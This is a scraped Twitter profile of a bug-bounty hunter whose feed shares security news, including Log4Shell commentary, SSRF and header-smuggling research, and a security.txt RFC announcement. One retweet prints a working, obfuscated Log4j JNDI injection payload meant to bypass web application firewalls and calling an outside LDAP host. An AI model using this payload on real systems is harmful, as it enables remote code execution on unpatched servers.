Nick || hunt4p1zza (@ngkogkos) 's Twitter Profile
Nick || hunt4p1zza

@ngkogkos

I find bugs for 🍕.

ID: 443537490

calendar_today22-12-2011 08:29:41

2,2K Tweet

2,2K Takipçi

492 Takip Edilen

Florian Roth ⚡️ (@cyb3rops) 's Twitter Profile Photo

What people seem to miss: The #Log4Shell vulnerability isn't just a RCE 0day. It's a vulnerability that causes hundreds and thousands of 0days in all kinds of software products. It's a 0day cluster bomb.

@levelsio (@levelsio) 's Twitter Profile Photo

🎉 I'm going to give one random person that retweets this $10,000. Because I’d rather spend my ad budget on you than BigTech 👩‍💻 I'm trying to promote my site Remote OK which helps you find a remote job so you don't need to go back to the office 💖 Thx! remoteok.com/?ref=twga2021

xxux11 ᯲ ̸ (@11xuxx) 's Twitter Profile Photo

So I share the last WAF bypass for log4j injection. WAF is OK but don't rely on them, they are fragile! Patch instead. ${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://mydogsbutt.com:1389/o} To bounty hunters: go go go! #bugbountytips

So I share the last WAF bypass for log4j injection. WAF is OK but don't rely on them, they are fragile! Patch instead.

${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://mydogsbutt.com:1389/o}

To bounty hunters: go go go!
#bugbountytips
Paul Seekamp (@nullenc0de) 's Twitter Profile Photo

Content Discovery and Param Miner in Burp found some hidden directory and parameter that was vulnerable to Log4j. The rest of the app was not vulnerable. CRAZY!😲

Nick || hunt4p1zza (@ngkogkos) 's Twitter Profile Photo

No doubt Daniel Thatcher's HTTP Header smuggling research made it to top 10 for 2021. The article presents a simple yet powerful methodology to look for HTTP header parsing discrepancies leading to smuggling, bypasses etc. intruder.io/research/pract…

thomasg.eth (@thomasg_eth) 's Twitter Profile Photo

For the past two weeks, I've been targeted in an extremely thorough social engineering scam that nearly cost me all of my ETH. I'm super lucky to have made it through unscathed. Here's the story 👇

Yassine Aboukir 🐐 (@yassineaboukir) 's Twitter Profile Photo

.Thái Vũ and I got to escalate a limited SSRF (CVE-2019-8451) on a BBP to extract AWS security credentials on the new metadata endpoint (IMDSv2) which is designed to block SSRF by rejecting unauthenticated GET and requiring valid token to be passed in the header. It was fun!

.<a href="/thaivd98/">Thái Vũ</a> and I got to escalate a limited SSRF (CVE-2019-8451) on a BBP to extract AWS security credentials on the new metadata endpoint (IMDSv2) which is designed to block SSRF by rejecting unauthenticated GET and requiring valid token to be passed in the header. It was fun!
Corben Leo (@hacker_) 's Twitter Profile Photo

In 2010, WikiLeaks released a classified document. A list of infrastructure critical to U.S national security. The government listed a Trans-Atlantic cable. 3 years ago, 19-year-old me gained ADMIN access to that cable (and another; shared codebase). 🧵Here's how I found it

In 2010, WikiLeaks released a classified document. 

A list of infrastructure critical to U.S national security.

The government listed a Trans-Atlantic cable.

3 years ago,

19-year-old me gained ADMIN access to that cable (and another; shared codebase).

🧵Here's how I found it
Nick || hunt4p1zza (@ngkogkos) 's Twitter Profile Photo

Ahead of the ISO 27001:2022 release, the ISO 27002:2022 update has recently been issued, outlining a restructure of the standard & several new controls. Dionach has created a high-level overview of this to help orgs prepare for ISO 27001:2022. bit.ly/3EOdIzf

Ed (@edoverflow) 's Twitter Profile Photo

After 5 years of work, security.txt is officially an RFC. I am pleased to announce RFC 9116: rfc-editor.org/rfc/rfc9116. I would like to use this opportunity to thank those who made this possible. Thank you. ❤️

After 5 years of work, security.txt is officially an RFC. I am pleased to announce RFC 9116: rfc-editor.org/rfc/rfc9116.

I would like to use this opportunity to thank those who made this possible. Thank you. ❤️
Nick || hunt4p1zza (@ngkogkos) 's Twitter Profile Photo

Hooray - just passed the #AWS SCS-C01 Security Specialty certification! Definitely a hard exam, but totally worth it as I've learnt a ton of AWS #infosec specifics which should help with security consulting for cloud solutions.

Dionach (@dionachcyber) 's Twitter Profile Photo

Join us for a live masterclass run by @CIISecHQ on July 20th at 16.30 BST. Presented by Technical Consultant, Flaviu Popescu, we'll look at cryptojacking and the risk it poses to organisations - including a live simulation. Sign up for the event here - lnkd.in/epGMapid

Join us for a  live masterclass run by @CIISecHQ on July 20th at 16.30 BST. Presented by Technical Consultant, Flaviu Popescu, we'll look at cryptojacking and the risk it poses to organisations - including a live simulation.

Sign up for the event here - lnkd.in/epGMapid